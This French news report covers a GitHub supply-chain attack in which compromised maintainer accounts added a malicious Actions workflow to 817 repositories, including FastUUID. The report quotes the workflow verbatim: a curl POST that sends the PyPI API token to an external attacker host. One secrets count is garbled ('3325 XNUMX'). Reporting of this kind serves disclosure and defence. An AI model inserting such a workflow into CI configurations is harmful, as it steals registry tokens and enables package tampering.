Des chercheurs de GitGuardian ont identifié une attaque massive contre des utilisateurs de GitHub. Celle-ci a impliqué la prise de contrôle de 327 comptes et l'installation d'un gestionnaire d'actions GitHub malveillant dans 817 dépôts. L'attaque a entraîné la fuite de 3325 XNUMX secrets utilisés dans les systèmes d'intégration continue et transmis via des variables d'environnement, notamment des jetons d'accès à PyPI, GitHub, NPM, DockerHub et divers services de stockage cloud.
GitHub Actions permet aux développeurs de code d'associer des gestionnaires pour automatiser diverses opérations dans GitHub. Par exemple, GitHub Actions permet d'effectuer certaines vérifications et tests lors de la validation, ou d'automatiser le traitement des nouveaux incidents. Le gestionnaire malveillant était distribué sous le nom de « GitHub Actions Security » et incluait une commande « curl » dans la section « run » qui envoyait le contenu des variables d'environnement à un hôte externe lors de l'exécution de tâches dans un environnement d'intégration continue. Le commit malveillant a été ajouté à partir des comptes des mainteneurs du projet, probablement victimes de piratage ou de phishing.
L'attaque a été découverte après l'analyse d'une activité anormale liée au paquet FastUUID, qui fournit un wrapper Python pour la bibliothèque Rust UUID. FastUUID, téléchargé près de 1.2 million de fois la semaine dernière, est utilisé comme dépendance dans le populaire projet LiteLLM, qui enregistre plus de 5 millions de téléchargements par semaine sur PyPI. L'analyse des modifications apportées au dépôt FastUUID a montré que le 2 septembre, le mainteneur du projet a ajouté un commit avec un nouveau gestionnaire d'actions Github, contenant le code permettant d'envoyer un jeton au dépôt PyPI sur un hôte externe. — name: Github Actions Security run: | curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page
Le problème a été identifié avant que les attaquants n'utilisent le jeton intercepté ; aucune modification malveillante ni version modifiée du package n'a été publiée sur PyPI pour FastUUID. Des substitutions d'actions GitHub similaires ont été détectées dans 816 autres dépôts, et des notifications ont été envoyées à leurs propriétaires, ainsi qu'à l'administration de PyPI, GitHub, NPM et DockerHub. Hier soir, des commits malveillants avaient été annulés dans une centaine de dépôts. Actuellement, une recherche sur GitHub identifie 100 commits contenant des actions GitHub malveillantes.
Source: opennet.ru
